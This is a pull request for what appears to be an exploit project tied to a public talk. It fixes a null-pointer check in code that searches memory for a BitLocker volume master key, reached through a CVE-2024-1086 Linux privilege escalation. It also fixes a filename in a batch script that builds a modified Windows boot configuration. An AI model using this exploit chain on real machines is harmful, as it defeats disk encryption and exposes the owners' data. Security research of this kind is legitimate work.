### PR TITLE
fixed some mistakes that where taken from the talk

### DIFF
--- a/Linux-Exploit/CVE-2024-1086/src/main.c
+++ b/Linux-Exploit/CVE-2024-1086/src/main.c
@@ -399,7 +399,7 @@ static void privesc_flh_bypass_no_time(int shell_stdin_fd, int shell_stdout_fd)
             // Now we found the correct VMK struct, look for more bytes that signal start of VMK
             // No idea what they actually represent, just bindiffed win10/11 struct in memory and found them to be constant here.
             void* pmd_vmk_addr = memmem(pmd_vmk_hdr_addr, end, "\x03\x20\x01\x00", 4);
-            if (pmd_vmk_hdr_addr == NULL) {
+            if (pmd_vmk_addr == NULL) {
                 printf("[+] VMK-needle not found!\n");
                 continue;
             }

--- a/create-bcd.bat
+++ b/create-bcd.bat
@@ -6,7 +6,7 @@ bcdedit /export BCD_modded
 
 bcdedit /store BCD_modded /create /d "softreboot" /application startup>GUID.txt
 For /F "tokens=2 delims={}" %%i in (GUID.txt) do (set REBOOT_GUID=%%i)
-del guid.txt
+del GUID.txt
 
 bcdedit /store BCD_modded /set {%REBOOT_GUID%} path "\shimx64.efi"
 bcdedit /store BCD_modded /set {%REBOOT_GUID%} device boot


### PR DESCRIPTION
I fixed two mistakes that also where present in the talk + blogpost, one could lead to segfault. 

the second memmem could potentialy return a nullpointer and doing arithmatic on it would lead to a segfault. 
also fixed the capitalization in the bat script since that is supposed to be written in capitals. 